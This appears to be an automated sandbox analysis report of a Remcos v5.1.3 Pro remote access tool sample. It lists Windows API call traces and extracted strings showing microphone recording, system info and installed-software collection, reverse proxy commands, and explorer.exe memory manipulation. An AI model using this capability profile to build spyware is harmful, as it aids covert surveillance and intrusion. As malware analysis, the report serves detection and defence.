                                              • Opcode ID: 80ffa916d59d600171d9ca3e34e0670cc9ac865161bbbc65e8436c0bee0f72cd
                                              • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                              • Opcode Fuzzy Hash: 80ffa916d59d600171d9ca3e34e0670cc9ac865161bbbc65e8436c0bee0f72cd
                                              • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                              • int.LIBCPMT ref: 00410EBC
                                                • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                              • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                              • __Init_thread_footer.LIBCMT ref: 00410F64
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                              • String ID: ,kG$0kG$@!G
                                              • API String ID: 3815856325-312998898
                                              • Opcode ID: 234cc645e6f2b623d94fc8cb2d29f52bc734eee13d30ec18b0bfe81019bed365
                                              • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                              • Opcode Fuzzy Hash: 234cc645e6f2b623d94fc8cb2d29f52bc734eee13d30ec18b0bfe81019bed365
                                              • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: 096e2c87fc6c65f47e4c6c752a7259066b900e282f660f6c8049b8ab8b72f741
                                              • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                              • Opcode Fuzzy Hash: 096e2c87fc6c65f47e4c6c752a7259066b900e282f660f6c8049b8ab8b72f741
                                              • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                              APIs
                                              • _free.LIBCMT ref: 004481B5
                                                • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                              • _free.LIBCMT ref: 004481C1
                                              • _free.LIBCMT ref: 004481CC
                                              • _free.LIBCMT ref: 004481D7
                                              • _free.LIBCMT ref: 004481E2
                                              • _free.LIBCMT ref: 004481ED
                                              • _free.LIBCMT ref: 004481F8
                                              • _free.LIBCMT ref: 00448203
                                              • _free.LIBCMT ref: 0044820E
                                              • _free.LIBCMT ref: 0044821C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                              • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                              • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                              • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                              • _memcmp.LIBVCRUNTIME ref: 004454A4
                                              • _free.LIBCMT ref: 00445515
                                              • _free.LIBCMT ref: 0044552E
                                              • _free.LIBCMT ref: 00445560
                                              • _free.LIBCMT ref: 00445569
                                              • _free.LIBCMT ref: 00445575
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Similarity
                                              • API ID: _free$ErrorLast$_abort_memcmp
                                              • String ID: C$v%(/
                                              • API String ID: 1679612858-1886176806
                                              • Opcode ID: 05701d8adb5406d1562c14b31316c91fe53ace2ea37426e70e906b20dbb38a64
                                              • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                              • Opcode Fuzzy Hash: 05701d8adb5406d1562c14b31316c91fe53ace2ea37426e70e906b20dbb38a64
                                              • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                              APIs
                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                              • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                              Strings
                                              • DisplayName, xrefs: 0041C7CD
                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C738
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEnumOpen
                                              • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                              • API String ID: 1332880857-3614651759
                                              • Opcode ID: 0758d2217d4cdf4be18b27332201ce298183b926a753a4e26667fde6bb3e7a3c
                                              • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                              • Opcode Fuzzy Hash: 0758d2217d4cdf4be18b27332201ce298183b926a753a4e26667fde6bb3e7a3c
                                              • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Eventinet_ntoa
                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                              • API String ID: 3578746661-3604713145
                                              • Opcode ID: 6e3468ae640a0ac899855ee624c8b62c6364f2bd00d9ee8107a4bc7941ae2f64
                                              • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                              • Opcode Fuzzy Hash: 6e3468ae640a0ac899855ee624c8b62c6364f2bd00d9ee8107a4bc7941ae2f64
                                              • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                              APIs
                                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                              • __fassign.LIBCMT ref: 0044B4F9
                                              • __fassign.LIBCMT ref: 0044B514
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                              • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID: v%(/
                                              • API String ID: 1324828854-2435473048
                                              • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                              • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                              • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                              • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                              • Sleep.KERNEL32(00000064), ref: 0041755C
                                              • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CreateDeleteExecuteShellSleep
                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                              • API String ID: 1462127192-2001430897
                                              • Opcode ID: d0f70b8df9fe10b093b079c3319088e07b2679cc5b0ed1992e361cead8d3f0ee
                                              • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                              • Opcode Fuzzy Hash: d0f70b8df9fe10b093b079c3319088e07b2679cc5b0ed1992e361cead8d3f0ee
                                              • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 00407418
                                              • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe), ref: 004074D9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CurrentProcess
                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                              • API String ID: 2050909247-4242073005
                                              • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                              • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                              • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                              • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                              APIs
                                              • _strftime.LIBCMT ref: 00401D50
                                                • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                              • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                              • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                              • API String ID: 3809562944-243156785
                                              • Opcode ID: 272d9e95f202b5b87e8d6f02197a65f7d4795c5aee8df22827821352ca84ba3d
                                              • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                              • Opcode Fuzzy Hash: 272d9e95f202b5b87e8d6f02197a65f7d4795c5aee8df22827821352ca84ba3d
                                              • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                              APIs
                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                              • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                              • waveInStart.WINMM ref: 00401CFE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                              • String ID: dMG$|MG$PG
                                              • API String ID: 1356121797-532278878
                                              • Opcode ID: 6aa69cd6a01d0fe2356010249b9bd36d42245e4d7c734ee1dd99acc2b44a8f66
                                              • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                              • Opcode Fuzzy Hash: 6aa69cd6a01d0fe2356010249b9bd36d42245e4d7c734ee1dd99acc2b44a8f66
                                              • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                              • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                              • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                              • TranslateMessage.USER32(?), ref: 0041D57A
                                              • DispatchMessageA.USER32(?), ref: 0041D584
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                              • String ID: Remcos
                                              • API String ID: 1970332568-165870891
                                              • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                              • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                              • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                              • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                              APIs
                                              • AllocConsole.KERNEL32(0C[), ref: 0041CE35
                                              • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                              • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Console$Window$AllocOutputShow
                                              • String ID: Remcos v$0C[$5.1.3 Pro$CONOUT$
                                              • API String ID: 4067487056-1050092612
                                              • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                              • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                              • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                              • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2617abffa626f75de14076698c196880abdc2722d48b4afa90194addc5c06332
                                              • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                              • Opcode Fuzzy Hash: 2617abffa626f75de14076698c196880abdc2722d48b4afa90194addc5c06332
                                              • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __freea$__alloca_probe_16_free
                                              • String ID: a/p$am/pm$h{D$v%(/
                                              • API String ID: 2936374016-1133261111
                                              • Opcode ID: f278f6ccdddd9c8957b45727c0f983370dbb743190d53240140d279861cd7d37
                                              • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                              • Opcode Fuzzy Hash: f278f6ccdddd9c8957b45727c0f983370dbb743190d53240140d279861cd7d37
                                              • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
